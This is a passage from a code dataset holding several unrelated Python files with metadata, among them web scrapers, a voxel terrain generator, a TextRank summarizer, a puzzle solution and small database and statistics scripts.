DownloadRawVideo(download_queue)\n thread.start()\n threads.append(thread)\n \n #[t.join() for t in threads]\n download_queue.join()\n print(\"av download finish\")\n \n _CONVERT_PROCESS_EXECUTOR.map(convert_video,current.pages)\n \n \n\nif __name__ == '__main__':\n deal_av('25755767',80)\n \n _CONVERT_PROCESS_EXECUTOR.shutdown()\n print(\"convert finished\")","sub_path":"bilibili_video_spider.py","file_name":"bilibili_video_spider.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
+{"seq_id":"26340811","text":"import requests\nfrom bs4 import BeautifulSoup as bs\n\ndef getLink(url):\n    res = requests.get(url)\n    soup = bs(res.content, \"html5lib\")\n    products = soup.find('div', attrs={'id': 'categoryList-contents-list'}).findAll('li')\n    if len(products) == 0:\n        return 0\n    with open('links.txt', 'a+') as f:\n        for product in products[::5]:\n            link = product.find('a').get('href')\n            f.write('http://www.wconcept.co.kr' + link)\n            f.write('\\n')\n    return 1\n\nif __name__ == '__main__':\n    base_urls = ['http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M90396395&ca=&czone=1',\n                 'http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M21405086&ca=&czone=4',\n                 'http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M60696432&ca=&czone=2',\n                 'http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M81180801&ca=&czone=3',\n                 'http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M69578731&ca=&czone=6']\n    for base_url in base_urls:\n        page = 1\n        flag = 1\n        while flag != 0:\n            url = base_url + '&page=' + str(page)\n            flag = getLink(url)\n            page += 1\n","sub_path":"wconcept_co_kr/getLinks.py","file_name":"getLinks.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"175949679","text":"# Imports, sorted alphabetically.\n\n# Python packages\nfrom time import time\n\n# Third-party packages\n# Nothing for now...\n\n# Modules from this project\nimport globals as G\nfrom nature import *\nfrom world import *\n\n\nclass Model(World):\n    def __init__(self, initialize=True):\n        super(Model, self).__init__()\n        if initialize:\n            print('Building terrain...')\n            print('using Perlin...')\n            return\n\n        #skip all of this, using perlin now.\n        start = time()\n        self.initialize()\n        print('Terrain successfully built in %f seconds.' % (time() - start))\n\n        print('Preparing game...')\n        self.post_initialize()\n\n    def initialize(self):\n        world_size = G.config.getint('World', 'size')\n        world_type = G.TERRAIN_CHOICE # FIXME: Unify names!\n        hill_height = G.TERRAIN['hill_height']\n        self.max_trees = G.TERRAIN['max_trees']\n        tree_chance = self.max_trees / float(world_size *\n                                             (G.SECTOR_SIZE ** 3))\n        n = world_size / 2 # 80\n        s = 1\n        y = 0\n\n        worldtypes_grounds = {\n            'plains': dirt_block,\n            'desert': (sand_block,) * 15 + (sandstone_block,) * 4,\n            'island': (water_block,) * 30 + (clay_block,) * 4,\n            'mountains': (dirt_block,) * 15 + (dirt_block,) * 3 + (stone_block,),\n            'snow': (snowgrass_block,) * 10 + (snow_block,) * 4 + (ice_block,) * 8,\n        }\n\n        world_type_trees = {\n            'plains': (OakTree, BirchTree, WaterMelon, Pumpkin, YFlowers, Potato, Carrot, Rose),\n            'desert': (Cactus, TallCactus, Rose),\n            'island': (OakTree, JungleTree, BirchTree, Cactus, TallCactus, WaterMelon, YFlowers, Reed, Rose),\n            'mountains': (OakTree, BirchTree, Pumpkin, YFlowers, Potato, Carrot),\n            'snow': (OakTree, BirchTree, WaterMelon, YFlowers, Potato, Rose),\n        }\n\n        # ores available on the lowest level, closest to bedrock\n        lowlevel_ores = ((stone_block,) * 75 + (diamondore_block,) * 2 + (sapphireore_block,) * 2)\n        # ores in the 'mid-level' .. 
also, the common ore blockes\n midlevel_ores = ((stone_block,) * 80 + (rubyore_block,) * 2 +\n (coalore_block,) * 4 + (gravel_block,) * 5 +\n (ironore_block,) * 5 + (lapisore_block,) * 2)\n # ores closest to the top level dirt and ground\n highlevel_ores = ((stone_block,) * 85 + (gravel_block,) * 5 + (coalore_block,) * 3 + (quartz_block,) * 5)\n\n for x in xrange(-n, n + 1, s):\n for z in xrange(-n, n + 1, s):\n\n # Generation of the outside wall\n if x in (-n, n) or z in (-n, n):\n for dy in xrange(-16, 10): # was -2 ,6\n self.init_block((x, y + dy, z), stone_block)\n continue\n\n # Generation of the ground\n\n block = worldtypes_grounds[world_type]\n levelcount=0\n\n\n if isinstance(block, (tuple, list)):\n block = random.choice(block)\n self.init_block((x, y - 2, z), block)\n for yy in xrange(-16, -2):\n # ores and filler...\n #oblock = random.choice(ore_type_blocks)\n levelcount = levelcount +1\n if levelcount < 4:\n blockset = lowlevel_ores\n if levelcount >= 5 and levelcount <= 13:\n blockset = midlevel_ores\n if levelcount >= 14:\n blockset = highlevel_ores\n oblock = random.choice(blockset)\n self.init_block((x, yy, z), oblock)\n\n for yy in xrange(-18, -16):\n self.init_block((x, yy , z), bed_block)\n\n # Perhaps a tree\n if self.max_trees > 0:\n showtree = random.random()\n if showtree <= tree_chance:\n tree_class = world_type_trees[world_type]\n if isinstance(tree_class, (tuple, list)):\n tree_class = random.choice(tree_class)\n self.generate_vegetation((x, y - 2, z), tree_class)\n\n if G.FLAT_MODE:\n return\n\n o = n - 10 + hill_height - 6\n\n world_type_blocks = {\n 'plains': dirt_block,\n 'desert': sand_block,\n 'island': (dirt_block, sand_block),\n 'mountains': stone_block,\n 'snow': snowgrass_block,\n }\n\n # Hills generation\n # FIXME: This generation in two phases (ground then hills), leads to\n # hills overlaying trees.\n for _ in xrange(world_size / 2 + 40): # (120):\n a = random.randint(-o, o)\n b = random.randint(-o, o)\n c = -1\n h = random.randint(1, hill_height)\n s = random.randint(4, hill_height + 2)\n d = 1\n block = world_type_blocks[world_type]\n if isinstance(block, (tuple, list)):\n block = random.choice(block)\n for y in xrange(c, c + h):\n for x in xrange(a - s, a + s + 1):\n for z in xrange(b - s, b + s + 1):\n if (x - a) ** 2 + (z - b) ** 2 > (s + 1) ** 2:\n continue\n if (x - 0) ** 2 + (z - 0) ** 2 < 5 ** 2:\n continue\n if (x, y, z) in self:\n continue\n self.init_block((x, y, z), block)\n\n # Perhaps a tree\n if self.max_trees > 0:\n showtree = random.random()\n if showtree <= tree_chance:\n tree_class = world_type_trees[world_type]\n if isinstance(tree_class, (tuple, list)):\n tree_class = random.choice(tree_class)\n self.generate_vegetation((x, y, z), tree_class)\n\n s -= d\n\n def generate_vegetation(self, position, vegetation_class):\n if position in self:\n return\n\n # Avoids a tree from touching another.\n if vegetation_class in TREES \\\n and self.has_neighbors(position, is_in=TREE_BLOCKS,\n diagonals=True):\n return\n\n x, y, z = position\n\n # Vegetation can't grow on anything.\n if self[(x, y - 1, z)] not in vegetation_class.grows_on:\n return\n\n vegetation_class.add_to_world(self, position)\n\n def init_block(self, position, block):\n self.add_block(position, block, sync=False, force=False)\n\n def post_initialize(self):\n # Convert dirt to grass if no block or a transparent one is above.\n for position, block in ((p, b) for p, b in self.items()\n if b is dirt_block):\n x, y, z = position\n above_position = x, y + 1, z\n if above_position 
not in self or self[above_position].transparent:\n                self[position] = grass_block\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"142528505","text":"import networkx as nx\ndef createG():\n    G = nx.Graph()\n    G.add_nodes_from([2, 3])\n    G.add_edge(2,3)\n    return G\n\nG = createG()\nimport json\nimport networkx as nx\nfrom networkx.readwrite import json_graph\njgraph = json_graph.node_link_data(G)\njs = json.dumps(jgraph)\n\n# path used both by the writer below and by the read-back check\nfile = '/home/cai.507/Documents/DeepLearning/GraphSAGE/' + 'test_data'\n\ndef writejs(js):\n    import sys\n    sys.path.append('/home/cai.507/Documents/DeepLearning/GraphSAGE')\n    f = open(file, 'w')\n    f.write(js)\n    f.close()\n\nwritejs(js)\nf = open(file, 'r')\njson_repr = f.read()\nassert js == json_repr\nf.close()\n\nfrom networkx.readwrite import json_graph\n\n# node_link_graph expects the dict form, so parse the JSON string first\nX = json_graph.node_link_graph(json.loads(json_repr))\n\nfrom networkx.readwrite import json_graph\nG = createG()\ndata = json_graph.node_link_data(G)\nimport pickle\nwith open('dict', 'wb') as handle:\n    pickle.dump(data, handle, protocol=2)\nwith open('dict', 'rb') as handle:\n    data_ = pickle.load(handle)\nassert data == data_\n\nH = json_graph.node_link_graph(data_)\n","sub_path":"graphsage/nxio.py","file_name":"nxio.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"45289738","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/17679\n\ndef down(m, n, check, board):\n    num = 0\n    for c in range(m):\n        for t in range(n):\n            if check[c][t] == True:\n                print(c, t)\n                num += 1\n                if c == 0:\n                    board[c][t] = '-'\n                else:\n                    board[c][t] = board[c - 1][t]\n                    board[c - 1][t] = '-'\n    \n    return num, board\n\n# change to False\ndef matching(m, n, board):\n    # create a check array initialized with False\n    check = [[False for j in range(n)] for i in range(m)]\n    \n    for b in range(m - 1):\n        for _b in range(n - 1):\n            if board[b][_b] != '-' and board[b][_b] == board[b][_b + 1] == board[b + 1][_b] == board[b + 1][_b + 1]:\n                check[b][_b] = True\n                check[b][_b + 1] = True\n                check[b + 1][_b] = True\n                check[b + 1][_b + 1] = True\n    \n    return check, board\n    \ndef solution(m, n, board):\n    board = [list(x) for x in board]\n    answer = 0\n    \n    while True:\n        new_check, new_board = matching(m, n, board)\n        if new_check != [[False for j in range(n)] for i in range(m)]:\n            num, board = down(m, n, new_check, new_board)\n            answer += num\n        else:\n            break\n    \n    return answer\n\n# print(solution(4, 5, [\"CCBDE\", \"AAADE\", \"AAABF\", \"CCBBF\"]))\n# print(solution(6, 6, [\"TTTANT\", \"RRFACC\", \"RRRFCC\", \"TRRRAA\", \"TTMMMF\", \"TMMTTJ\"]))\nprint(solution(3, 8, [\"AAAAAAAA\", \"BBAAAACC\", \"BBAAAACC\"]))","sub_path":"python_/programmers/Lv.2/[1차] 프렌즈4블록.py","file_name":"[1차] 프렌즈4블록.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"528455552","text":"import json\nimport requests\nimport sys\nsys.path.append('../')\nimport globals\n\nimport appJar\n\ntry:\n    import xir\n    from xir import eq, choice, gt, ge, select\n    NOXIR=False\nexcept ImportError:\n    NOXIR=True\n\nmainUrl = 'http://127.0.0.1:5000/'\n\ndef removeEndDigit(name):\n    return name.strip(\"0123456789\")\n\n\nclass deployHandler():\n\n    def __init__(self):\n        self.constraintButtons = []\n        self.constraints = {}\n        self.mergedConstraints = {}\n\n    def expandConstraints(self):\n        self.constraints = {}\n        # XXX This 
is a lot of extra work to redo the globals constraint dictionary\n # to include only the types we deal with for constraints right now and\n # to expand cases where the main node name (e.g. 'fred') has a constraint of 'num'\n # and deal with cases when there are specific constraints of some of these (e.g. an 'os' for 'fred1')\n for n in globals.nodes:\n self.constraints[n] = {}\n for type in ['os', 'nodetype', 'num']:\n if n in globals.constraints and type in globals.constraints[n]:\n self.constraints[n][type] = globals.constraints[n][type]\n elif removeEndDigit(n) in globals.constraints and type in globals.constraints[removeEndDigit(n)]:\n self.constraints[n][type] = globals.constraints[removeEndDigit(n)][type]\n \n def mergeConstraints(self):\n # After we've expanded constraints, we can merge ones that are the same.\n self.mergedConstraints = {}\n covered = []\n for n in self.constraints:\n #if 'num' in self.constraints[n]:\n # numWSame = int(self.constraints[n]['num'])\n #else:\n numWSame = 1\n if n in covered:\n continue\n for x in self.constraints:\n if x in covered:\n continue\n # Don't compare our self to our self (no point), and don't compare two things with different base names.\n if n != x and removeEndDigit(n) == removeEndDigit(x):\n # If we find the same name-start + all the same constraints are the same, we can merge these.\n sameConstraints = True\n for type in self.constraints[n]:\n if type not in self.constraints[x] or self.constraints[x][type] != self.constraints[n][type]:\n sameConstraints = False\n if sameConstraints:\n #if 'num' in self.constraints[x]:\n # numWSame = numWSame + int(self.constraints[x]['num'])\n #else:\n # numWSame = int(numWSame) + 1\n numWSame = int(numWSame) + 1\n covered.append(x)\n self.mergedConstraints[n] = {}\n self.mergedConstraints[n]['count'] = int(numWSame)\n for type in self.constraints[n]:\n if type != 'num':\n self.mergedConstraints[n][type] = self.constraints[n][type]\n covered.append(n)\n \n \n def process_constraints(self):\n \n checkBoxesToAdd = []\n \n for c in self.constraintButtons:\n try:\n globals.app.removeCheckBox(c)\n except:\t\n pass\n self.constraintButtons = []\n self.expandConstraints()\n self.mergeConstraints()\n\n print(\"CONSTRAINTS\")\n print(globals.constraints)\n print(\"Our merged ones:\")\n print(self.mergedConstraints)\n \n for name in self.mergedConstraints:\n constraintStr = removeEndDigit(name)\n if int(self.mergedConstraints[name]['count']) > 1:\n constraintStr + '*'\n constraintStr + ': '\n for type in self.mergedConstraints[name]:\n constraintStr = constraintStr + \" \" + type + '(' + str(self.mergedConstraints[name][type]) + ')'\n checkBoxesToAdd.append(constraintStr)\n self.constraintButtons.append(constraintStr)\n\n return checkBoxesToAdd\n \n def satisfyConstraintCombo(self):\n pass\n \n @staticmethod\n def checkConstraints(button):\n globals.app.clearListBox(\"solution list\", callFunction=False)\n json_constraints = deployHandler.specifyCheckedConstraintsInXIR()\n \n if json_constraints == None:\n if NOXIR:\n globals.app.addListItem(\"solution list\",\"Need Xir support to process constraints.\")\n else:\n globals.app.addListItem(\"solution list\",\"Unable to process constraints.\")\n return\n\n print(json.dumps(json_constraints, sort_keys=False))\n \n mainUrl = 'http://127.0.0.1:5000/' \n s = requests.Session()\n try:\n r = s.post(mainUrl + 'site_solutions', json=json_constraints, timeout=1)\n possibleSolutions = False\n if 'results' in json.loads(r.json()):\n for result in 
json.loads(r.json())['results']:\n if result['result'] == 'solution':\n print(\"Solution from %s\" % \" \".join(result['site_combo']))\n globals.app.addListItem(\"solution list\",\" \".join(result['site_combo']))\n possibleSolutions = True\n if not possibleSolutions:\n globals.app.addListItem(\"solution list\",\"NO SOLUTIONS\")\n except requests.exceptions.ReadTimeout:\n globals.app.addListItem(\"solution list\",\"Solution not calculated yet.\")\n return\n except requests.exceptions.RequestException as e:\n globals.app.addListItem(\"solution list\",\"Constraint server unreachable (assumed to be at %s).\" % (mainUrl))\n return\n except Exception as e:\n print(e)\n return\n\n @staticmethod\n def specifyCheckedConstraintsInXIR():\n if NOXIR:\n return None\n \n top = xir.Xir()\n nodes = {}\n \n # Get a list of the checkboxed constraints we want to investigate.\n # XXX HACK: This will give us all checkboxes in the app. \n # So far we are only using these for constraints.\n n = 0\n for constraint in globals.app.getAllCheckBoxes():\n if not globals.app.getCheckBox(constraint):\n continue\n print(\"%s to xir\" % constraint)\n count = 0\n os = None\n nodetype = None\n # XXX right now we're assuming OS names and such won't have spaces!\n for item in constraint.split():\n # XXX again, hacky, we assume a '(' indicates a constraint.\n if '(' in item:\n try:\n (type, value) = item.split('(')\n value = value.strip(')')\n if type == 'os':\n os = value \n elif type == 'nodetype':\n nodetype = value\n elif type == 'count':\n count = int(value)\n except Exception as e:\n print(\"Problem parsing constraint: %s. %s\" % (constraint,e))\n \n # For now, we're skipping trying to get multiples of any one type\n # because the constraint solver can get overwhelmed.\n #for i in range(0,count):\n for i in range(0, 1):\n props = {'name': str(n)}\n if nodetype != None:\n props['platform'] = xir.select(value.strip()) \n if os != None:\n props['image'] = xir.select(value.strip())\n node = top.structure.node(props)\n nodes[n] = node\n n = n+1\n \n return top.structure.xir_dict()\n \n \n def checkConstraintServer(self):\n return True\n \n \n def getSuggestions(self, type='os'):\n suggestions = []\n try:\n s = requests.Session()\n r = s.post(mainUrl + 'getResourceList', data={'type':type})\n data = json.loads(r.content)\n for item in data:\n if item not in suggestions:\n suggestions.append(item)\n except Exception as e:\n print(e)\n pass\n \n print(\"SUGGESTIONS:\")\n print(suggestions)\n \n return suggestions\n \n \n ","sub_path":"DEW/deploy/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"293952329","text":"import re, sys\nfrom os import listdir\nfrom os.path import isfile\n\ndef getInput(string):\n if sys.version_info[0] < 3:\n return raw_input(string)\n return input(string)\n\nprint(\"----------------------------------\\n\"\n \"This application will search all .txt files in the current directory for a matching \"\n \"string and print the filenames it finds matches for at the end.\\n\"\n \"You can also print out all matching lines as it searches.\\n\")\n\nstring = getInput('Enter string to match: ')\nverbose_mode = getInput('Print matching lines [Y]? 
')\n\nprint(\"----------------------------------\\n\")\n\nregex_filename = re.compile('^.*\\.txt')\nregex_string = re.compile('.*' + string + '.*')\nmatches = []\n\n# Get all entries in this directory\nfor f in listdir('.'):\n # If its a file ending '.txt' process it\n if isfile(f) and regex_filename.search(f):\n found = False\n print( \"Checking > \"+f)\n # Iterate round all lines\n for i, line in enumerate(open(f)):\n line = line\n # Check each line for string\n for match in re.finditer(regex_string, line):\n found = True\n # if in verbose mode, show each line it found it at\n if verbose_mode.upper() == 'Y':\n print(' [%s] %s' % (i+1, line.strip()))\n\n # If the string was found anywhere, add it to summary list\n if found:\n matches.append(f)\n\n# Output all files where string existed\nprint(\"\\nSUMMARY\\n-------\")\nfor f in matches:\n print(f)\n\n","sub_path":"src/grepplus.py","file_name":"grepplus.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"482176128","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 10 21:34:18 2022\n\n@author: irtazakhalid\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit \n\ndef dom(a,b=1,points=100):\n return np.linspace(a,b,points)\n\ndef right_tail(dom, power=5):\n f = lambda x: 1/(x**power)\n return f(dom)/f(dom).sum()\n\ndef left_tail(dom, power=5):\n f = lambda x: 1/(x**power)\n return (f(dom)/f(dom).sum())[::-1]\n\ndef uniform(dom):\n return 1/len(dom)\n\ndef gaussian(dom):\n mean = np.mean(dom)\n f = lambda x: np.exp(-0.25*(x-mean)**2)\n return f(dom)/f(dom).sum()\n\ndef moments_vs_tails(a, pdfs=[right_tail, left_tail, gaussian, uniform]):\n fig, ax = plt.subplots(ncols=len(pdfs))\n ax = ax.ravel()\n a_grid = np.linspace(a,1,100)\n for j, pdf in enumerate(pdfs):\n sdict = {kk:np.zeros(100) for kk in [\"mean\", \"std\", \"mom_2\", \"mom_3\"]}\n for i,a in enumerate(a_grid):\n x = dom(a=a,b=1, points=50)\n # x[-1]=0.2\n # reduce a to make pdf weights grow faster, transition to delta\n # weights are always constant, just shifting the domain..\n pdfw = pdf(dom(a=0.5, b=1, points=50))\n mean = (pdfw*x).sum()\n sdict[\"mean\"][i] = mean\n sdict[\"std\"][i] = np.sqrt((pdfw*(x-mean)**2).sum())\n sdict[\"mom_2\"][i] = np.power((pdfw*(x)**2).sum(),1)#*(1/50)**(1/3-1/1)\n sdict[\"mom_3\"][i] = np.power((pdfw*(x)**3).sum(),1)\n \n for key in sdict:\n ax[j].plot(a_grid, sdict[key], label=key)\n ax[j].set_xlabel(\"a dom left\")\n ax[j].set_title(pdf.__name__)\n ax[j].vlines(0.5, 0, 1, linestyles=\"--\")\n ax[0].set_ylabel(\"statistic\")\n ax[0].legend(fontsize=7)\n plt.tight_layout() \n \nmoments_vs_tails(0.001)\n\n\ndef p_order_rim(a=0.2, b=1,pdfs=[right_tail, left_tail, gaussian, uniform]):\n ps=range(1,50)\n x = dom(a=a, b=b, points=100)\n plt.figure()\n for pdf in pdfs:\n out = []\n for power in ps:\n pdfw = pdf(dom(a=0.5, b=1, points=100))\n # x[-1]=0.2\n out.append(np.power((pdfw*(1-x)**power).sum(), 1/power))\n \n plt.plot(ps, out, label=pdf.__name__)\n f = lambda x,a,b: a*np.log(x)+b\n ff,_=curve_fit(f, ps, out)\n plt.plot(ps, f(ps, *ff), linestyle=\"--\",label=f\"log fit slope {round(ff[0],3)}\")\n \n plt.xlabel(\"p\")\n plt.ylabel(\"p-order rim\")\n plt.legend()\n plt.title(f\"dom [{a}, {b}]\")\n\ndef samples_vs_mean_val():\n plt.figure()\n for low in np.linspace(0.01, 0.99, 10):\n rims = []\n ns = np.arange(10,100,10)\n for n in ns:\n 
rims.append((1-np.random.uniform(low=low, high=1, size=n)).mean())\n plt.plot(ns, rims*ns**(0.5), label=f\"min(rim)={np.round(low,2)}\")\n plt.xlabel(\"samples\")\n plt.ylabel(\"rim upper bound\")\n plt.legend()\np_order_rim()\nsamples_vs_mean_val()\nplt.show()\n \n \n ","sub_path":"rim_analysis.py","file_name":"rim_analysis.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"89725705","text":"from readCsv import getTitles, getContents\r\nimport csv\r\nimport numpy as np\r\nfrom konlpy.tag import Kkma\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\nkkma = Kkma()\r\n\r\nlist_titles = getTitles()\r\nlist_contents = getContents()\r\n\r\nf = open('summaries.csv', 'w', newline=\"\\n\", encoding='utf-8')\r\nwriter = csv.writer(f)\r\n\r\nfor contents in list_contents:\r\n list_sentences = []\r\n list_temp = kkma.sentences(contents)\r\n for i in range(len(list_temp)):\r\n if len(list_temp[i]) > 10:\r\n list_sentences.append(list_temp[i])\r\n tfidf = TfidfVectorizer()\r\n tfidf_sentence_matrix = tfidf.fit_transform(list_sentences).toarray()\r\n transpose_tfidf_sentence_matrix = np.transpose(tfidf_sentence_matrix) # 그래프 생성을 위한 전치행렬 만들기\r\n sentence_graph = np.dot(tfidf_sentence_matrix, transpose_tfidf_sentence_matrix) # 전치행렬과의 곱으로 그래프에서 어느 노드들이 엣지로 연결되었는지 나타내는 정사각 행렬을 구한다.\r\n d = 0.85 # damping factor , PageRank에서 웹 서핑을 하는 사람이 해당 페이지를 만족하지 못하고 다른페이지로 이동하는 확률로써, TextRank에서도 그 값을 그대로 사용(0.85로 설정)\r\n A = sentence_graph\r\n size = sentence_graph.shape[0]\r\n for i in range(size):\r\n A[i][i] = 0\r\n sum_row = np.sum(A[i][:])\r\n if sum_row != 0:\r\n A[i][:] /= sum_row # textrank formula에서 한 노드와 연결된 다른 노드들의 가중치값을 나누는 부분 -> 이후 상수에 반영 \r\n A[i][:] *= -d # TR(Vi) = (1-d) + d * sum(가중치*TR(Vj)) -> TR(Vi) - d(c1TR(Va) + c2TR(Vb) + c3TR(Vc) + c4TR(Vd)) = 1 - d (c1, c2, c3, c4 is constant) ->Ax=B\r\n A[i][i] = 1\r\n B = (1 - d) * np.ones((size, 1))\r\n textrank = np.linalg.solve(A, B) # x = [TR(Va), TR(Vb), TR(Vc), TR(Vd)] -> each textrank\r\n idx_textrank = enumerate(textrank)\r\n sorted_textrank = sorted(idx_textrank, key = lambda x: x[1], reverse = True)\r\n\r\n contents = \"\"\r\n summaries = []\r\n\r\n for idx in sorted_textrank[:5]:\r\n contents = contents + list_sentences[idx[0]]\r\n summaries.append(contents)\r\n for summary in summaries:\r\n writer.writerow([summary])\r\n\r\nf.close()","sub_path":"make_summary.py","file_name":"make_summary.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"262314973","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a Damen spider created on top of the ATSSpider\nscrapy crawl damen -a url=\"http://career.damen.com/en/jobs\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://career.damen.com/en/jobs\n\"\"\"\nfrom re import compile\nfrom urlparse import urljoin\nfrom json import loads as json_loads\nfrom hashlib import md5\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, NormalizedJoin\n\n\nclass Damen(ATSSpider):\n\n name = \"damen\"\n api_re = compile(\"pagesize=10\")\n jobs_per_page = 100\n search_offset = 0\n\n def parse(self, response):\n sel = Selector(response)\n api_url = sel.xpath(\n \"//meta[@name='listinghandler']/@content\"\n ).extract()\n if api_url:\n 
self.api_url = urljoin(\n response.url,\n self.api_re.sub(\"pagesize=%s\" % self.jobs_per_page, api_url[0])\n )\n yield Request(url=self.api_url, callback=self.parse_json_jobs)\n\n def parse_json_jobs(self, response):\n try:\n api_jobs = json_loads(response.body)\n except:\n # no json data, exiting\n return\n\n if self.search_offset == 0:\n self.expected_job_count = api_jobs.get(\"TotalItems\", -1)\n\n for job in api_jobs.get('ResultItems', []):\n job_url = urljoin(response.url, job.get('Url', ''))\n meta = {\n 'title': job.get('Title', ''),\n 'jobcategory': [\n x.get('Name', '') for x in job.get('JobTypes', [])\n ],\n 'location': [\n job.get('LocationName', ''),\n job.get('LocationCity', ''),\n job.get('LocationCountryCode', '')\n ],\n 'experiencerequirements': job.get('Experience', ''),\n }\n yield Request(\n url=job_url, meta=meta, callback=self.parse_job_callback()\n )\n\n self.search_offset += self.jobs_per_page\n if self.search_offset < self.expected_job_count:\n yield Request(\n url=\"%s&startindex=%s\" % (self.api_url, self.search_offset),\n callback=self.parse_json_jobs\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_value('jobcategory', response.meta['jobcategory'])\n loader.add_value(\n 'location', response.meta['location'], NormalizedJoin(\", \")\n )\n loader.add_value(\n 'experiencerequirements', response.meta['experiencerequirements']\n )\n loader.add_xpath(\n 'educationrequirements',\n \"//label[text()='Level of education']/following-sibling::p\"\n )\n loader.add_xpath(\n 'description',\n [\n \"//div[@class='user-generated']/node()[not(@class='buttonbar' or preceding-sibling::p[@class='buttonbar'])]\",\n \"//div[@class='section' and (h2//*[contains(text(),'Profile') or contains(text(),'Profiel')] or h2[contains(text(),'Profile') or contains(text(),'Profiel')])]/node()[not(self::img)]\"\n ]\n )\n loader.add_xpath(\n 'responsibilities',\n \"//div[@class='section' and h2[contains(text(),'Tasks & Responsibilities') or contains(text(), 'Taken & Verantwoordelijkheden')]]/node()\"\n )\n loader.add_xpath(\n 'company_description',\n \"//div[@class='section' and h2[contains(text(),'Department Information')]]/text()\"\n )\n loader.add_value(\n 'referencenumber', md5(response.url).hexdigest(),\n Prefix(\"%s-\" % self.name)\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/damen.py","file_name":"damen.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"374621017","text":"#LISTA\nnumeros = list()\ntam = int(input(\"Tamanho do vetor: \"))\nfor i in range(tam):\n valor = int(input(f\"Digite o numero do vetor na posição {i}: \"))\n numeros.append(valor)\n\n# BUSCA LINEAR\nnum_pesquisa = int(input(\"Número pesquisado: \"))\nposicao_resultado = -1\n\nfor i in range(tam):\n if numeros[i] == num_pesquisa:\n posicao_resultado = i\n break\nif posicao_resultado < 0:\n print('Número não encontrado')\nelse:\n print(f\"Número encontrado na posição {posicao_resultado}\")\n#FIM BUSCA LINEAR","sub_path":"Python - Algoritmos 1/busca_linear.py","file_name":"busca_linear.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"538259102","text":"import mysql.connector\nimport uuid\n\n\ndef octave_simulate():\n res = list()\n \n for i in range(0,17):\n 
res.append(None)\n \n res[2] = 0.2345\n res[4] = 1.4322\n res[8] = 0.000023\n\n return res\n\n\ndef example_sql():\n work_id = str(uuid.uuid1())\n\n # None in Python will be translated to NULL in MariaDB\n results = octave_simulate()\n \n db = mysql.connector.connect(\n host=\"127.0.0.1\",\n user=\"ubuntu\",\n passwd=\"ubuntu\",\n database=\"benchop\"\n )\n \n cur = db.cursor()\n\n sql = \"INSERT INTO results (id, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11, r12, r13, r14, r15, r16, r17) \" \\\n \"values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n val = (work_id, results[0], results[1], results[2], results[3], results[4], results[5], results[6], results[7],\n results[8], results[9], results[10], results[11], results[12], results[13], results[14], results[15],\n results[16])\n cur.execute(sql, val)\n \n db.commit()\n db.close()\n\n\ndef main():\n example_sql()\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"code/db/db_example_insert.py","file_name":"db_example_insert.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"221796715","text":"from __future__ import print_function, absolute_import, division\n\nimport os\nimport sys\nimport cv2\nimport glob\nimport torch\nimport pathlib\nimport numpy as np\nfrom torch import nn\nfrom PIL import Image\nimport torch.nn.functional as F\nfrom skimage.io import imread\nimport matplotlib.pyplot as plt\nfrom utils.label_utils import get_labels\nfrom sklearn.externals._pilutil import bytescale\n\ndef re_normalize(inp: np.ndarray, low: int = 0, high: int = 255):\n \"\"\"Normalize the data to a certain range. Default: [0-255]\"\"\"\n inp_out = bytescale(inp, low=low, high=high)\n return inp_out\n\n\nlabels = get_labels()\nid2label = { label.id : label for label in labels }\ntrainid2label = { label.trainId : label for label in labels }\n\nclass 